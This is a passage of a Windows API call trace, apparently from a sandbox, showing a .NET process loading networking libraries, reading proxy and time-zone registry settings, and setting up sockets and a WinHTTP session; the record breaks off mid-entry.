[0068.392] GetFileType (hFile=0x41c) returned 0x1 [0068.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x13fecf0) returned 1 [0068.392] GetFileType (hFile=0x41c) returned 0x1 [0068.397] GetProcAddress (hModule=0x772d0000, lpProcName="CreateEvent") returned 0x0 [0068.399] GetProcAddress (hModule=0x772d0000, lpProcName="CreateEventW") returned 0x7733eb30 [0068.400] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x420 [0068.400] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x424 [0068.405] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13fe9f4 | out: TokenHandle=0x13fe9f4*=0x428) returned 1 [0068.408] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13fea04 | out: TokenHandle=0x13fea04*=0x42c) returned 1 [0068.450] GetProcAddress (hModule=0x772d0000, lpProcName="QueryPerformanceFrequency") returned 0x772e5dc0 [0068.450] QueryPerformanceFrequency (in: lpFrequency=0x755b20 | out: lpFrequency=0x755b20*=100000000) returned 1 [0068.453] GetProcAddress (hModule=0x772d0000, lpProcName="QueryPerformanceCounter") returned 0x772e5da0 [0068.453] QueryPerformanceCounter (in: lpPerformanceCount=0x13fed78 | out: lpPerformanceCount=0x13fed78*=16420851371) returned 1 [0068.456] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13fe9c0 | out: TokenHandle=0x13fe9c0*=0x430) returned 1 [0068.459] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13fe9d0 | out: TokenHandle=0x13fe9d0*=0x434) returned 1 [0068.488] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13fe9d4 | out: TokenHandle=0x13fe9d4*=0x438) returned 1 [0068.490] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13fe9e4 | out: TokenHandle=0x13fe9e4*=0x43c) returned 1 [0068.493] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13fec5c | out: TokenHandle=0x13fec5c*=0x440) returned 1 [0068.498] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x13fdd94 | out: phkResult=0x13fdd94*=0x444) returned 0x0 [0068.499] RegQueryValueExW (in: hKey=0x444, lpValueName="InstallationType", lpReserved=0x0, lpType=0x13fddb4, lpData=0x0, lpcbData=0x13fddb0*=0x0 | out: lpType=0x13fddb4*=0x1, lpData=0x0, lpcbData=0x13fddb0*=0xe) returned 0x0 [0068.499] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryValueEx") returned 0x0 [0068.499] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryValueExW") returned 0x756fe5a0 [0068.499] RegQueryValueExW (in: hKey=0x444, lpValueName="InstallationType", lpReserved=0x0, lpType=0x13fddb4, lpData=0x374dff4, lpcbData=0x13fddb0*=0xe | out: lpType=0x13fddb4*=0x1, lpData="Client", lpcbData=0x13fddb0*=0xe) returned 0x0 [0068.529] RegCloseKey (hKey=0x444) returned 0x0 [0068.530] SysReAllocStringLen (in: pbstr=0x13fe000*=0x0, psz="rasapi32.dll", len=0xc | out: pbstr=0x13fe000*="rasapi32.dll") returned 1 [0068.530] CharLowerBuffW (in: lpsz="rasapi32.dll", cchLength=0xc | out: lpsz="rasapi32.dll") returned 0xc [0068.530] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll", hFile=0x0, dwFlags=0x800) returned 0x0 [0068.530] GetLastError () returned 0x7e [0068.530] SetLastError (dwErrCode=0x7e) [0068.534] SysReAllocStringLen (in: pbstr=0x13fe000*=0x0, psz="rasapi32.dll", len=0xc | out: pbstr=0x13fe000*="rasapi32.dll") returned 1 [0068.534] CharLowerBuffW (in: lpsz="rasapi32.dll", cchLength=0xc | out: lpsz="rasapi32.dll") returned 0xc [0068.534] LoadLibraryExW (lpLibFileName="rasapi32.dll", hFile=0x0, dwFlags=0x800) returned 0x6f6a0000 [0069.217] GetLastError () returned 0x0 [0069.217] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0069.218] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0069.218] GetModuleFileNameA (in: hModule=0x6f6a0000, lpFilename=0x13fdee4, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\SYSTEM32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll")) returned 0x20 [0069.218] GetCurrentProcess () returned 0xffffffff [0069.218] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdfe8*=0x6f750114, NumberOfBytesToProtect=0x13fdfec, NewAccessProtection=0x4, OldAccessProtection=0x13fe020 | out: BaseAddress=0x13fdfe8*=0x6f750000, NumberOfBytesToProtect=0x13fdfec, OldAccessProtection=0x13fe020*=0x2) returned 0x0 [0069.218] GetCurrentProcess () returned 0xffffffff [0069.218] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdfe8*=0x6f750114, NumberOfBytesToProtect=0x13fdfec, NewAccessProtection=0x2, OldAccessProtection=0x13fe020 | out: BaseAddress=0x13fdfe8*=0x6f750000, NumberOfBytesToProtect=0x13fdfec, OldAccessProtection=0x13fe020*=0x4) returned 0x0 [0069.218] GetCurrentProcess () returned 0xffffffff [0069.218] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdfe8*=0x6f75011c, NumberOfBytesToProtect=0x13fdfec, NewAccessProtection=0x4, OldAccessProtection=0x13fe020 | out: BaseAddress=0x13fdfe8*=0x6f750000, NumberOfBytesToProtect=0x13fdfec, OldAccessProtection=0x13fe020*=0x2) returned 0x0 [0069.219] GetCurrentProcess () returned 0xffffffff [0069.219] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdfe8*=0x6f75011c, NumberOfBytesToProtect=0x13fdfec, NewAccessProtection=0x2, OldAccessProtection=0x13fe020 | out: BaseAddress=0x13fdfe8*=0x6f750000, NumberOfBytesToProtect=0x13fdfec, OldAccessProtection=0x13fe020*=0x4) returned 0x0 [0069.219] SetLastError (dwErrCode=0x0) [0069.220] GetProcAddress (hModule=0x6f6a0000, lpProcName="RasEnumConnections") returned 0x0 [0069.220] GetProcAddress (hModule=0x6f6a0000, lpProcName="RasEnumConnectionsW") returned 0x6f6bf0d0 [0069.221] CoTaskMemAlloc (cb=0xcc0) returned 0xe10f0 [0069.222] RasEnumConnectionsW (in: param_1=0xe10f0, param_2=0x13fec6c, param_3=0x13fec70 | out: param_1=0xe10f0, param_2=0x13fec6c, param_3=0x13fec70) returned 0x0 [0069.410] CoTaskMemFree (pv=0xe10f0) [0069.412] SysReAllocStringLen (in: pbstr=0x13fdfd8*=0x0, psz="ws2_32.dll", len=0xa | out: pbstr=0x13fdfd8*="ws2_32.dll") returned 1 [0069.412] CharLowerBuffW (in: lpsz="ws2_32.dll", cchLength=0xa | out: lpsz="ws2_32.dll") returned 0xa [0069.412] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll", hFile=0x0, dwFlags=0x800) returned 0x0 [0069.412] GetLastError () returned 0x7e [0069.412] SetLastError (dwErrCode=0x7e) [0069.416] SysReAllocStringLen (in: pbstr=0x13fdfd8*=0x0, psz="ws2_32.dll", len=0xa | out: pbstr=0x13fdfd8*="ws2_32.dll") returned 1 [0069.416] CharLowerBuffW (in: lpsz="ws2_32.dll", cchLength=0xa | out: lpsz="ws2_32.dll") returned 0xa [0069.417] LoadLibraryExW (lpLibFileName="ws2_32.dll", hFile=0x0, dwFlags=0x800) returned 0x754f0000 [0069.998] GetLastError () returned 0x0 [0069.999] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0069.999] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0069.999] GetModuleFileNameA (in: hModule=0x754f0000, lpFilename=0x13fdebc, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0069.999] GetCurrentProcess () returned 0xffffffff [0069.999] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdfc0*=0x7553d1ac, NumberOfBytesToProtect=0x13fdfc4, NewAccessProtection=0x4, OldAccessProtection=0x13fdff8 | out: BaseAddress=0x13fdfc0*=0x7553d000, NumberOfBytesToProtect=0x13fdfc4, OldAccessProtection=0x13fdff8*=0x2) returned 0x0 [0069.999] GetCurrentProcess () returned 0xffffffff [0069.999] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdfc0*=0x7553d1ac, NumberOfBytesToProtect=0x13fdfc4, NewAccessProtection=0x2, OldAccessProtection=0x13fdff8 | out: BaseAddress=0x13fdfc0*=0x7553d000, NumberOfBytesToProtect=0x13fdfc4, OldAccessProtection=0x13fdff8*=0x4) returned 0x0 [0070.000] GetCurrentProcess () returned 0xffffffff [0070.000] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdfc0*=0x7553d1c4, NumberOfBytesToProtect=0x13fdfc4, NewAccessProtection=0x4, OldAccessProtection=0x13fdff8 | out: BaseAddress=0x13fdfc0*=0x7553d000, NumberOfBytesToProtect=0x13fdfc4, OldAccessProtection=0x13fdff8*=0x2) returned 0x0 [0070.000] GetCurrentProcess () returned 0xffffffff [0070.000] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdfc0*=0x7553d1c4, NumberOfBytesToProtect=0x13fdfc4, NewAccessProtection=0x2, OldAccessProtection=0x13fdff8 | out: BaseAddress=0x13fdfc0*=0x7553d000, NumberOfBytesToProtect=0x13fdfc4, OldAccessProtection=0x13fdff8*=0x4) returned 0x0 [0070.000] SetLastError (dwErrCode=0x0) [0070.001] GetProcAddress (hModule=0x754f0000, lpProcName="WSAStartup") returned 0x754f5b40 [0070.001] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x13fea58 | out: lpWSAData=0x13fea58) returned 0 [0070.006] GetProcAddress (hModule=0x754f0000, lpProcName="WSASocket") returned 0x0 [0070.006] GetProcAddress (hModule=0x754f0000, lpProcName="WSASocketW") returned 0x75501700 [0070.007] GetProcAddress (hModule=0x754f0000, lpProcName="setsockopt") returned 0x754ffd70 [0070.007] GetProcAddress (hModule=0x754f0000, lpProcName="WSAEventSelect") returned 0x754f7750 [0070.007] GetProcAddress (hModule=0x754f0000, lpProcName="ioctlsocket") returned 0x754ffa10 [0070.008] GetProcAddress (hModule=0x754f0000, lpProcName="closesocket") returned 0x75500910 [0070.008] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x4a8 [0070.534] setsockopt (s=0x4a8, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0070.534] closesocket (s=0x4a8) returned 0 [0070.535] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x4a8 [0070.536] setsockopt (s=0x4a8, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0070.536] closesocket (s=0x4a8) returned 0 [0070.536] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4a8 [0070.537] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4ac [0070.537] GetProcAddress (hModule=0x754f0000, lpProcName="ioctlsocket") returned 0x754ffa10 [0070.538] ioctlsocket (in: s=0x4a8, cmd=-2147195266, argp=0x13fec74 | out: argp=0x13fec74) returned 0 [0070.538] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4b0 [0070.538] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4b4 [0070.538] ioctlsocket (in: s=0x4b0, cmd=-2147195266, argp=0x13fec74 | out: argp=0x13fec74) returned 0 [0070.539] GetProcAddress (hModule=0x754f0000, lpProcName="WSAIoctl") returned 0x754fe800 [0070.539] WSAIoctl (in: s=0x4a8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x13fec5c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x13fec5c, lpOverlapped=0x0) returned -1 [0070.543] GetProcAddress (hModule=0x772d0000, lpProcName="FormatMessage") returned 0x0 [0070.546] GetProcAddress (hModule=0x772d0000, lpProcName="FormatMessageW") returned 0x772e4be0 [0070.546] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x13fe98c, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0070.552] GetProcAddress (hModule=0x754f0000, lpProcName="WSAEventSelect") returned 0x754f7750 [0070.552] WSAEventSelect (s=0x4a8, hEventObject=0x4ac, lNetworkEvents=512) returned 0 [0070.553] WSAIoctl (in: s=0x4b0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x13fec5c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x13fec5c, lpOverlapped=0x0) returned -1 [0070.554] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x13fe98c, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0070.554] WSAEventSelect (s=0x4b0, hEventObject=0x4b4, lNetworkEvents=512) returned 0 [0070.554] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4bc [0070.554] GetProcAddress (hModule=0x6f6a0000, lpProcName="RasConnectionNotification") returned 0x0 [0070.554] GetProcAddress (hModule=0x6f6a0000, lpProcName="RasConnectionNotificationW") returned 0x6f6bd040 [0070.554] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x4bc, param_3=0x3) returned 0x0 [0070.563] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenCurrentUser") returned 0x757006f0 [0070.564] GetProcAddress (hModule=0x756e0000, lpProcName="RegCloseKey") returned 0x756fed60 [0070.564] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x13fec88 | out: phkResult=0x13fec88*=0x4d4) returned 0x0 [0070.565] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyEx") returned 0x0 [0070.565] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyExW") returned 0x756fe580 [0070.565] RegOpenKeyExW (in: hKey=0x4d4, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x13fec3c | out: phkResult=0x13fec3c*=0x4d8) returned 0x0 [0070.565] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4dc [0070.565] GetProcAddress (hModule=0x756e0000, lpProcName="RegNotifyChangeKeyValue") returned 0x75700390 [0070.565] RegNotifyChangeKeyValue (hKey=0x4d8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4dc, fAsynchronous=1) returned 0x0 [0070.566] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyEx") returned 0x0 [0070.566] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyExW") returned 0x756fe580 [0070.566] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x13fec40 | out: phkResult=0x13fec40*=0x4e0) returned 0x0 [0070.568] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4e4 [0070.568] RegNotifyChangeKeyValue (hKey=0x4e0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4e4, fAsynchronous=1) returned 0x0 [0070.568] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x13fec40 | out: phkResult=0x13fec40*=0x4e8) returned 0x0 [0070.568] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4ec [0070.568] RegNotifyChangeKeyValue (hKey=0x4e8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4ec, fAsynchronous=1) returned 0x0 [0070.568] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13fec2c | out: TokenHandle=0x13fec2c*=0x4f0) returned 1 [0070.574] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x13fe538 | out: phkResult=0x13fe538*=0x4f4) returned 0x0 [0070.574] RegQueryValueExW (in: hKey=0x4f4, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x13fe554, lpData=0x0, lpcbData=0x13fe550*=0x0 | out: lpType=0x13fe554*=0x0, lpData=0x0, lpcbData=0x13fe550*=0x0) returned 0x2 [0070.574] RegCloseKey (hKey=0x4f4) returned 0x0 [0070.576] SysReAllocStringLen (in: pbstr=0x13fe038*=0x0, psz="winhttp.dll", len=0xb | out: pbstr=0x13fe038*="winhttp.dll") returned 1 [0070.576] CharLowerBuffW (in: lpsz="winhttp.dll", cchLength=0xb | out: lpsz="winhttp.dll") returned 0xb [0070.576] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll", hFile=0x0, dwFlags=0x800) returned 0x0 [0070.576] GetLastError () returned 0x7e [0070.576] SetLastError (dwErrCode=0x7e) [0070.580] SysReAllocStringLen (in: pbstr=0x13fe038*=0x0, psz="winhttp.dll", len=0xb | out: pbstr=0x13fe038*="winhttp.dll") returned 1 [0070.580] CharLowerBuffW (in: lpsz="winhttp.dll", cchLength=0xb | out: lpsz="winhttp.dll") returned 0xb [0070.580] LoadLibraryExW (lpLibFileName="winhttp.dll", hFile=0x0, dwFlags=0x800) returned 0x6f570000 [0071.129] GetLastError () returned 0x0 [0071.129] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0071.129] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0071.129] GetModuleFileNameA (in: hModule=0x6f570000, lpFilename=0x13fdf1c, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\SYSTEM32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")) returned 0x1f [0071.129] GetCurrentProcess () returned 0xffffffff [0071.129] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe020*=0x6f60a158, NumberOfBytesToProtect=0x13fe024, NewAccessProtection=0x4, OldAccessProtection=0x13fe058 | out: BaseAddress=0x13fe020*=0x6f60a000, NumberOfBytesToProtect=0x13fe024, OldAccessProtection=0x13fe058*=0x2) returned 0x0 [0071.130] GetCurrentProcess () returned 0xffffffff [0071.130] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe020*=0x6f60a158, NumberOfBytesToProtect=0x13fe024, NewAccessProtection=0x2, OldAccessProtection=0x13fe058 | out: BaseAddress=0x13fe020*=0x6f60a000, NumberOfBytesToProtect=0x13fe024, OldAccessProtection=0x13fe058*=0x4) returned 0x0 [0071.130] GetCurrentProcess () returned 0xffffffff [0071.130] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe020*=0x6f60a16c, NumberOfBytesToProtect=0x13fe024, NewAccessProtection=0x4, OldAccessProtection=0x13fe058 | out: BaseAddress=0x13fe020*=0x6f60a000, NumberOfBytesToProtect=0x13fe024, OldAccessProtection=0x13fe058*=0x2) returned 0x0 [0071.130] GetCurrentProcess () returned 0xffffffff [0071.130] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe020*=0x6f60a16c, NumberOfBytesToProtect=0x13fe024, NewAccessProtection=0x2, OldAccessProtection=0x13fe058 | out: BaseAddress=0x13fe020*=0x6f60a000, NumberOfBytesToProtect=0x13fe024, OldAccessProtection=0x13fe058*=0x4) returned 0x0 [0071.131] SetLastError (dwErrCode=0x0) [0071.131] GetProcAddress (hModule=0x6f570000, lpProcName="WinHttpOpen") returned 0x6f59f830 [0071.131] GetProcAddress (hModule=0x6f570000, lpProcName="WinHttpOpenW") returned 0x0 [0071.132] GetProcAddress (hModule=0x6f570000, lpProcName="WinHttpCloseHandle") returned 0x6f594660 [0071.132] GetProcAddress (hModule=0x6f570000, lpProcName="WinHttpCloseHandleW") returned 0x0 [0071.132] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x9b908 [0071.992] GetProcAddress (hModule=0x6f570000, lpProcName="WinHttpSetTimeouts") returned 0x6f596000 [0071.992] GetProcAddress (hModule=0x6f570000, lpProcName="WinHttpSetTimeoutsW") returned 0x0 [0071.992] WinHttpSetTimeouts (hInternet=0x9b908, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0071.994] GetProcAddress (hModule=0x772d0000, lpProcName="LocalFree") returned 0x772e5b40 [0071.995] GetProcAddress (hModule=0x6f570000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x6f5819b0 [0071.995] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x13fec3c | out: pProxyConfig=0x13fec3c) returned 1 [0072.701] GetProcAddress (hModule=0x772d0000, lpProcName="GetEnvironmentVariable") returned 0x0 [0072.704] GetProcAddress (hModule=0x772d0000, lpProcName="GetEnvironmentVariableW") returned 0x772e4fb0 [0072.704] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x13fe4b0, nSize=0x80 | out: lpBuffer="ノ珿￿￿鍆Á鎷Á쇜￿皴犣佚玲虖봫肠\x07皴犣㦀牪胰犎㦀牪胰犎Ŀ啾玲￿￿Ŀ꛰珿￿￿佚玲刐玲䪌犭") returned 0x0 [0072.704] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x13fe4b0, nSize=0x80 | out: lpBuffer="ノ珿￿￿鍆Á鎷Á쇜￿皴犣佚玲虖봫肠\x07皴犣㦀牪胰犎㦀牪胰犎Ŀ啾玲￿￿Ŀ꛰珿￿￿佚玲刐玲䪌犭") returned 0x0 [0072.711] GetProcAddress (hModule=0x756e0000, lpProcName="EventRegister") returned 0x779c1990 [0072.713] EtwEventRegister (in: ProviderId=0x3750de8, EnableCallback=0xa60686, CallbackContext=0x0, RegHandle=0x3750dc4 | out: RegHandle=0x3750dc4) returned 0x0 [0072.715] GetProcAddress (hModule=0x756e0000, lpProcName="EventSetInformation") returned 0x779c2340 [0072.718] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13fe99c | out: TokenHandle=0x13fe99c*=0x534) returned 1 [0072.720] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13fe9ac | out: TokenHandle=0x13fe9ac*=0x540) returned 1 [0072.779] EtwEventRegister (in: ProviderId=0x3752494, EnableCallback=0xa606ae, CallbackContext=0x0, RegHandle=0x3752470 | out: RegHandle=0x3752470) returned 0x0 [0072.779] EtwEventSetInformation (RegHandle=0xbd4e0, InformationClass=0x5f, EventInformation=0x2, InformationLength=0x3752434) returned 0x0 [0072.783] GetProcAddress (hModule=0x772d0000, lpProcName="SetEvent") returned 0x7733ec50 [0072.783] SetEvent (hEvent=0x420) returned 1 [0072.850] GetProcAddress (hModule=0x753c0000, lpProcName="CoWaitForMultipleHandles") returned 0x74a21b90 [0072.850] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x13feb80*=0x4bc, lpdwindex=0x13fe99c | out: lpdwindex=0x13fe99c) returned 0x80010115 [0080.025] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x13feb60*=0x4ac, lpdwindex=0x13fe97c | out: lpdwindex=0x13fe97c) returned 0x80010115 [0080.025] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x13feb60*=0x4b4, lpdwindex=0x13fe97c | out: lpdwindex=0x13fe97c) returned 0x80010115 [0080.026] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x13febb4*=0x4dc, lpdwindex=0x13fe9d4 | out: lpdwindex=0x13fe9d4) returned 0x80010115 [0080.026] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x13febb4*=0x4e4, lpdwindex=0x13fe9d4 | out: lpdwindex=0x13fe9d4) returned 0x80010115 [0080.027] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x13febb4*=0x4ec, lpdwindex=0x13fe9d4 | out: lpdwindex=0x13fe9d4) returned 0x80010115 [0080.032] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13fe8f0 | out: TokenHandle=0x13fe8f0*=0x580) returned 1 [0080.033] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13fe900 | out: TokenHandle=0x13fe900*=0x584) returned 1 [0080.037] GetProcAddress (hModule=0x772d0000, lpProcName="GetTimeZoneInformation") returned 0x772e5650 [0080.038] GetTimeZoneInformation (in: lpTimeZoneInformation=0x13fea70 | out: lpTimeZoneInformation=0x13fea70) returned 0x1 [0080.042] GetProcAddress (hModule=0x772d0000, lpProcName="GetDynamicTimeZoneInformation") returned 0x772e6c90 [0080.042] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x13fe8cc | out: pTimeZoneInformation=0x13fe8cc) returned 0x1 [0080.044] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x13fe9b0 | out: phkResult=0x13fe9b0*=0x588) returned 0x0 [0080.044] RegQueryValueExW (in: hKey=0x588, lpValueName="TZI", lpReserved=0x0, lpType=0x13fe9cc, lpData=0x0, lpcbData=0x13fe9c8*=0x0 | out: lpType=0x13fe9cc*=0x3, lpData=0x0, lpcbData=0x13fe9c8*=0x2c) returned 0x0 [0080.044] RegQueryValueExW (in: hKey=0x588, lpValueName="TZI", lpReserved=0x0, lpType=0x13fe9cc, lpData=0x3755ffc, lpcbData=0x13fe9c8*=0x2c | out: lpType=0x13fe9cc*=0x3, lpData=0x3755ffc*, lpcbData=0x13fe9c8*=0x2c) returned 0x0 [0080.044] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x13fe804 | out: phkResult=0x13fe804*=0x0) returned 0x2 [0080.045] RegQueryValueExW (in: hKey=0x588, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x13fe9a4, lpData=0x0, lpcbData=0x13fe9a0*=0x0 | out: lpType=0x13fe9a4*=0x1, lpData=0x0, lpcbData=0x13fe9a0*=0x20) returned 0x0 [0080.045] RegQueryValueExW (in: hKey=0x588, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x13fe9a4, lpData=0x3756420, lpcbData=0x13fe9a0*=0x20 | out: lpType=0x13fe9a4*=0x1, lpData="@tzres.dll,-320", lpcbData=0x13fe9a0*=0x20) returned 0x0 [0080.045] RegQueryValueExW (in: hKey=0x588, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x13fe9a4, lpData=0x0, lpcbData=0x13fe9a0*=0x0 | out: lpType=0x13fe9a4*=0x1, lpData=0x0, lpcbData=0x13fe9a0*=0x20) returned 0x0 [0080.045] RegQueryValueExW (in: hKey=0x588, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x13fe9a4, lpData=0x3756478, lpcbData=0x13fe9a0*=0x20 | out: lpType=0x13fe9a4*=0x1, lpData="@tzres.dll,-322", lpcbData=0x13fe9a0*=0x20) returned 0x0 [0080.045] RegQueryValueExW (in: hKey=0x588, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x13fe9a4, lpData=0x0, lpcbData=0x13fe9a0*=0x0 | out: lpType=0x13fe9a4*=0x1, lpData=0x0, 